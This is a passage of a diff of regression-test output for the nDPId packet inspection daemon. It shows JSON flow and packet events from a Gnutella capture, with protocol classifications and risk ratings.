00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":63001,"flow_last_seen":63445,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially 
Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":65062,"flow_last_seen":65418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1142,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":69227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1089,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00622{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
@@ -1358,42 +1348,49 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3112,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0jJQAAIARUAcKAAIPp3KqnHAJXSQAIHOsR05EED9HAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0770AAIARtrQKAAIPpanijnAJGMoAIIHcR05EED9IAQFUC1FLUlAGUk5BXS\/iNQlw"} 00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":180000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 
-00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1138,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.103.139.2","src_port":50269,"dst_port":3186,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74328,"flow_last_seen":88171,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74329,"flow_last_seen":74396,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1102,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":15284,"flow_last_seen":23969,"flow_idle_time":180000,"flow_min_l4_payload_len":101,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1601,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63962,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":87671,"flow_last_seen":88801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50283,"dst_port":35004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":180000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":15285,"flow_last_seen":21297,"flow_idle_time":180000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":83805,"flow_last_seen":84251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1144,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72264,"flow_last_seen":72720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":954,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":63001,"flow_last_seen":78562,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74327,"flow_last_seen":74692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1108,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1105,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00783{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":16487,"flow_last_seen":192636,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":603,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 
00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90746,"flow_last_seen":90799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.165.203.190","src_port":50317,"dst_port":21995,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":90746,"flow_last_seen":91392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3761,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":50316,"dst_port":30566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91151,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":1717,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":50313,"dst_port":35481,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90842,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.168.34.105","src_port":50304,"dst_port":39908,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":91380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1100,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":50309,"dst_port":21301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90745,"flow_last_seen":90863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1090,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.99.176.20","src_port":50307,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90747,"flow_last_seen":91396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3774,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":50319,"dst_port":53489,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90747,"flow_last_seen":90902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":670,"flow_tot_l4_payload_len":1773,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"164.132.10.25","src_port":50322,"dst_port":55302,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 